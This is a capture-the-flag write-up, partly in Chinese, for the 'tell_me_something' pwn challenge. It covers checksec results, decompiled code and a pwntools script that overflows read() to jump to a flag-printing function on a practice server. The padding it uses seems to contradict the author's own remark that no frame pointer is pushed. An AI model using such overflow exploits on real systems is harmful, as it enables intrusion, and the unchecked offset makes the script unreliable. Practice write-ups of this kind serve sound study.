jarvisoj_tell_me_something
Ubuntu 16
0x01
checksec
1 2 3 4 5 6 [*] '/home/zelas/Desktop/pwn/jarvisoj_tell_me_something/guestbook' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled //栈不可执行 PIE: No PIE (0x400000)
IDA
1 2 3 4 5 6 7 8 int __cdecl main (int argc, const char **argv, const char **envp) { __int64 v4; write(1 , "Input your message:\n" , 0x14 uLL); read(0 , &v4, 0x100 uLL); return write(1 , "I have received your message, Thank you!\n" , 0x29 uLL); }
可疑函数good_game()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 int good_game () { FILE *v0; int result; char buf[9 ]; v0 = fopen("flag.txt" , "r" ); while ( 1 ) { result = fgetc(v0); buf[0 ] = result; if ( (_BYTE)result == 0xFF ) break ; write(1 , buf, 1uLL ); } return result; }
//0X400620
0x02
思路
1.利用read()处溢出至good_game()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near ; __unwind { sub rsp, 88h // mov edx, 14h ; n mov esi, offset aInputYourMessa ; "Input your message:\n" mov edi, 1 ; fd call _write mov rsi, rsp ; buf mov edx, 100h ; nbytes xor edi, edi ; fd call _read mov edx, 29h ; ')' ; n mov esi, offset aIHaveReceivedY ; "I have received your message, Thank you"... mov edi, 1 ; fd call _write add rsp, 88h //这里是没有入栈的 retn ; } // starts at 4004E0 main endp
0x03
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) io = remote('node4.buuoj.cn' , 25838 ) padding = 0x88 + 0x8 good_game = 0X400620 payload = flat(b'a' * padding, good_game) io.recvuntil(b'Input your message:\n' ) io.sendline(payload) pause() io.interactive()
